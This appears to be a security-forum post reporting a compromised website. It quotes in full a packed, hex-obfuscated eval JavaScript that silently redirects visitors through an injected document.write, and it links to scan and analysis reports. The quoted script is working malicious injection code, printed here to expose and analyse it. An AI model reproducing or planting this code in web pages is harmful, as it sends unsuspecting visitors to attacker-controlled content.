A conditional redirect from here: https://www.virustotal.com/nl/url/cecfac7252da8a2fa20d2c12ced063e7e165a28350267a9bd0bd8143233fe637/analysis/1412773165/
</script></head><script language="javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('t d=["\\f\\o\\f\\v\\a","\\X\\Y\\W\\e\\S\\e\\T\\U\\11\\C\\m\\17\\15\\14\\R\\13\\18","\\B\\b\\a\\j","\\L","\\o\\k\\y\\a\\12\\K\\j","\\g\\J\\w\\g\\f\\b","\\I\\B\\F\\C\\m\\s","\\B\\f\\f\\G\\M\\s\\s\\v\\k\\r\\a\\f\\P\\r\\q\\i\\s","\\A\\j\\b\\h\\i\\a\\g\\a\\f\\e\\b\\q\\H\\g\\l\\c\\C\\m\\m\\O\\N\\Q\\c\\e\\j\\b\\h\\i\\a\\w\\q\\b\\y\\a\\b\\l\\c\\k\\q\\c\\e\\w\\q\\b\\y\\a\\b\\l\\c\\m\\c\\e\\j\\b\\h\\i\\a\\g\\G\\h\\r\\o\\k\\D\\l\\c\\m\\c\\z\\A\\j\\b\\h\\i\\a\\e\\k\\h\\i\\a\\l\\c\\i\\h\\o\\k\\c\\e\\g\\b\\r\\l\\c","\\c\\e\\g\\r\\b\\q\\v\\v\\o\\k\\D\\l\\c\\F\\a\\g\\c\\z\\A\\s\\j\\b\\h\\i\\a\\g\\a\\f\\z","\\H\\b\\o\\f\\a"];E[d[0]]=d[1];t u=Z[d[2]];t p=u[d[4]](d[3]);V(p>0){n=u[d[5]](p+1)}16{n=d[6]};t x=d[7];E[d[10]](d[8]+x+n+d[9]);',62,71,'||||||||||x65|x72|x27|_0|x20|x74|x73|x61|x6D|x66|x6E|x3D|x30||x69||x6F|x63|x2F|var||x6C|x62||x64|x3E|x3C|x68|x31|x67|document|x79|x70|x77|x7A|x75|x4F|x3F|x3A|x2C|x25|x2E|x2A|u9178|x2D|u6211|u751F|if|u71D5|u5F20|u6D77|location||u53D1|x78|u6545|u5FC3|u7684|else|u5E74|u4E8B'.split('|'),0,{}))</script>
for analysis see: http://jsunpack.jeek.org/?report=cdf13b5ecb7569da9c896d82a96425742d868eb7
and
site in code has particular risks: http://toolbar.netcraft.com/site_report?url=http://lncet.com
document.write%28unescape%28%22%253 vulnerable to index.html header and footer shell attack!
域名/IP WHOIS 查询结果由 118cha.com 提供,[复制结果]
本结果页地址 http://ipwhois.118cha.com/ 125.88.190.42.html
polonus